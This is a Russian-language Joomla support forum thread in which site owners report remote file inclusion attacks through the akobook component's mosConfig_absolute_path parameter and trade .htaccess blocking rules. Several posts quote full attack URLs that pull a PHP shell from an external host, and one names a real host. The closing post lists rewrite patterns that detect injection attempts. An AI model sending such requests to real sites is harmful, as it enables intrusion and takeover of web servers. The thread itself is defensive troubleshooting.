Взломали сайт через mosConfig_absolute_path

Тема в разделе "Вопросы безопасности", создана пользователем Titanium, 28.05.2008.

  1. Offline

    Titanium Недавно здесь

    Регистрация:
    01.02.2008
    Сообщения:
    12
    Симпатии:
    0
    Помогите с проблемой.
    Взломали сайт через mosConfig_absolute_path, подставив его в качестве параметра компоненты. Компонента - akobook

    Уязвимость можно бы устранить, запретив register_globals, но у меня стоит компонента AkoForms, с помощью которой пользователи заполняют веб-формуи отправляют сообщения с сайта, и при отключении register_globals она перестает работать.

    В некоторых источниках описывается устранение этой уязвимости вставкой в компонент кода:
    defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

    Код в компоненте есть, но уязвимость не устранена.

    Больше никаких решений этой проблемы я не нашел. Если они есть, будьте добры, ткните пальцем

    Реальная помощь в решении проблемы может быть оплачена.

    Спасибо.
     
  2.  
  3. Dead Krolik
    Offline

    Dead Krolik Недавно здесь => Cпециалист <=

    Регистрация:
    13.04.2007
    Сообщения:
    3 685
    Симпатии:
    101
    Пол:
    Мужской
    Ответ: Взломали сайт через mosConfig_absolute_path

    Покажь через какой файл ломают (запрос) и в каком месте эта штука есть.
     
  4. Offline

    Titanium Недавно здесь

    Регистрация:
    01.02.2008
    Сообщения:
    12
    Симпатии:
    0
    Ответ: Взломали сайт через mosConfig_absolute_path

    Не понял? Что показать? Как сломать сайт и чем? В общий доступ? Ключи от квартиры, где деньги лежат, тоже дать?
    ;)
    Заходят так:
    /component/option,com_akobook/Itemid,37/home/skboku1/public_html/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.ХХХhackers.net/r5Х.txt?
     
    Последнее редактирование: 28.05.2008
  5. Dead Krolik
    Offline

    Dead Krolik Недавно здесь => Cпециалист <=

    Регистрация:
    13.04.2007
    Сообщения:
    3 685
    Симпатии:
    101
    Пол:
    Мужской
    Ответ: Взломали сайт через mosConfig_absolute_path

    Хе-хе, а теперь показывай где в akobook.php ты этот код вставил. Я бы вообще на твоем месте сделал то, что по-моему в версии RE по умолчанию сделано - защита от этих ?mosConfig... прямо в .htaccess
     
  6. Offline

    Titanium Недавно здесь

    Регистрация:
    01.02.2008
    Сообщения:
    12
    Симпатии:
    0
    Ответ: Взломали сайт через mosConfig_absolute_path

    Показываю:

    А вот за подсказку спасибо большое.

    Нашел в .htaccess строчки. Они оказывается по умолчанию закомментированы. Задействовал их. Теперь эта дырка закрыта
     
  7. Dead Krolik
    Offline

    Dead Krolik Недавно здесь => Cпециалист <=

    Регистрация:
    13.04.2007
    Сообщения:
    3 685
    Симпатии:
    101
    Пол:
    Мужской
    Ответ: Взломали сайт через mosConfig_absolute_path

    Если эта строка там есть, то дальше нее прямой вызов не уйдет.
     
  8. Offline

    Titanium Недавно здесь

    Регистрация:
    01.02.2008
    Сообщения:
    12
    Симпатии:
    0
    Ответ: Взломали сайт через mosConfig_absolute_path

    Так в том то и дело, что строка эта есть, но именно так и взламывают. Я думаю, может как-то эмулируется _VALID_MOS ?

    Добавлено через 7 минут
    Ведь ссылка для взлома гораздо хитрее
    Не просто
    /component/option,com_akobook/Itemid,37/?mosConfig_absolute_path=http://www.ХХХhackers.net/r5Х.txt?
    , а
    /component/option,com_akobook/Itemid,37/home/skboku1/public_html/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.ХХХhackers.net/r5Х.txt?

    Зачем-то ведь добавлен фрагмент: home/skboku1/public_html/components/com_akobook/akobook.php
     
    Последнее редактирование: 30.05.2008
  9. Fanamura
    Offline

    Fanamura Доброта

    Регистрация:
    12.03.2007
    Сообщения:
    5 094
    Симпатии:
    158
    Пол:
    Мужской
    Ответ: Взломали сайт через mosConfig_absolute_path

    как зачем добавлено, идет вызов файла, иначе бы index.php подцепили бы
     
  10. Offline

    Titanium Недавно здесь

    Регистрация:
    01.02.2008
    Сообщения:
    12
    Симпатии:
    0
    Ответ: Взломали сайт через mosConfig_absolute_path

    Идет вызов вот этого файла, как я понимаю: http://www.ХХХhackers.net/r5Х.txt
     
  11. Fanamura
    Offline

    Fanamura Доброта

    Регистрация:
    12.03.2007
    Сообщения:
    5 094
    Симпатии:
    158
    Пол:
    Мужской
    Ответ: Взломали сайт через mosConfig_absolute_path

    Нет, akobook.php, а через него уже эксплойт
     
  12. Offline

    Titanium Недавно здесь

    Регистрация:
    01.02.2008
    Сообщения:
    12
    Симпатии:
    0
    Ответ: Взломали сайт через mosConfig_absolute_path

    У меня на сайте нет пути home/skboku1/public_html/components/com_akobook/akobook.php У меня вообще нет папки skboku1
    тогда чей это путь? Какого сайта?
     
  13. Fanamura
    Offline

    Fanamura Доброта

    Регистрация:
    12.03.2007
    Сообщения:
    5 094
    Симпатии:
    158
    Пол:
    Мужской
    Ответ: Взломали сайт через mosConfig_absolute_path

    а спорим есть components/com_akobook/akobook.php , если у тебя конечно, эта гсотевая вообще стоит.
     
  14. sectus
    Offline

    sectus Недавно здесь => Cпециалист <=

    Регистрация:
    19.04.2006
    Сообщения:
    1 210
    Симпатии:
    46
    Пол:
    Мужской
    Ответ: Взломали сайт через mosConfig_absolute_path

    А был ли мальчик? кто вообще сказал, что именно так был взломано?
     
  15. Offline

    Titanium Недавно здесь

    Регистрация:
    01.02.2008
    Сообщения:
    12
    Симпатии:
    0
    Ответ: Взломали сайт через mosConfig_absolute_path

    Да этот путь есть. Вопрос тогда, зачем упоминание про home/skboku1/ ?

    Добавлено через 3 минуты
    Мальчик был. Во первых, заходили по этой ссылке, во вторых я сам заходил. По ссылке открывается очень интересная софтина. Очень красиво и грамотно написан менеджер файлов. Я пробовал - и редактировать можно, и удалять, и закачивать файлы. Мне бы кто такое написал - я бы вместо ФТП-клиента пользовался - очень удобно
     
    Последнее редактирование: 05.06.2008
  16. Fanamura
    Offline

    Fanamura Доброта

    Регистрация:
    12.03.2007
    Сообщения:
    5 094
    Симпатии:
    158
    Пол:
    Мужской
    Ответ: Взломали сайт через mosConfig_absolute_path

    Titanium,
    Абсолютный путь ет. "Серверный".
    Это xxxx (блин, слово забыл, вспомню, напишу), позволяет работать на сервере с правами root'а
     
  17. Offline

    Titanium Недавно здесь

    Регистрация:
    01.02.2008
    Сообщения:
    12
    Симпатии:
    0
    Ответ: Взломали сайт через mosConfig_absolute_path

    Нет такого серверного пути! Ну вы меня совсем за дурачка принимаете что ли?
    Я потому и спрашиваю, зачем подстановка home/skboku1/public_html/components/com_akobook/akobook.php
    если у меня на сервере аналогичный путь: /home/vizitki/site.ru/docs/components/com_akobook/akobook.php

    или это просто наобум выбраный или есть какой-то тайный смысл.
    Почему не вызывают просто через /component/option,com_akobook/Itemid,37/akobook.php?mosConfig_absolute_path=http://www.ХХХhackers.net/r5Х.txt?
    Или так:
    /components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.ХХХhackers.net/r5Х.txt?

    зачем там лишний путь еще?
     
  18. Fanamura
    Offline

    Fanamura Доброта

    Регистрация:
    12.03.2007
    Сообщения:
    5 094
    Симпатии:
    158
    Пол:
    Мужской
    Ответ: Взломали сайт через mosConfig_absolute_path

    А вам это надо? Раз не верите мне, когда пишу на простом языке, пояснять не буду :) Разве вопрос в этом, а не как защититься?
    Защититься просто, нужно сменить гостевую)

    Вспомнил слово, это SHELL
     
  19. sectus
    Offline

    sectus Недавно здесь => Cпециалист <=

    Регистрация:
    19.04.2006
    Сообщения:
    1 210
    Симпатии:
    46
    Пол:
    Мужской
    Ответ: Взломали сайт через mosConfig_absolute_path

    Блин... есть конечно разница... Я вообще в непонятках почему такое срабатывает. Мне очень интересно как такое может быть. Конфигурационный файл инклудится должен был и все перекрыть. Если конечно никаких хаков не было.
     
  20. Offline

    Titanium Недавно здесь

    Регистрация:
    01.02.2008
    Сообщения:
    12
    Симпатии:
    0
    Ответ: Взломали сайт через mosConfig_absolute_path

    Ну во первых, для того, чтобы защититься, надо знать как атакуют. Во вторых, метод взлома мной прикрыт, но такие же дыры могут быть и в других компонентах.
    А менять расширение - не выход. Не факт, что другая гостевая окажется менее дырявой. Тогда уж надо сразу отказываться от джумлы.
     
  21. Offline

    nagi Недавно здесь

    Регистрация:
    03.10.2007
    Сообщения:
    48
    Симпатии:
    0
    Пол:
    Мужской
    Всем привиет сегодня меня пытались ломануть подобной хренью , вроде не ломанули но незнаю как это уточнить еще!!!!


    сайт/index.php?mosConfig_absolute_path=http://www.jv-deals.com/wordpress/wp-content/themes/AllBlue/AllBl

    у меня Joomla 13 re

    какие данные должны быть в .htaccess?

    ########## Начало
    #
    # Попытка модификации переменных mosConfig* через URL
    RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
    # (сам не понял нафик запрещать base64_encode :), будем верить автору)
    RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
    # Запрет передачи тэгов <script> в адресе (скорее всего защита от XSS)
    RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
    # Старая дыра, когда пытались подменить GLOBALS через RG_EMULATION
    RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
    # Аналогичная дыра, но для _REQUEST
    RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
    # И в конце даем на такие запросы ответ 403 (aka Forbidden)
    RewriteRule ^(.*)$ index.php [F,L]
    #
    ########## Конец
     
    Последнее редактирование: 02.07.2009

Поделиться этой страницей

Загрузка...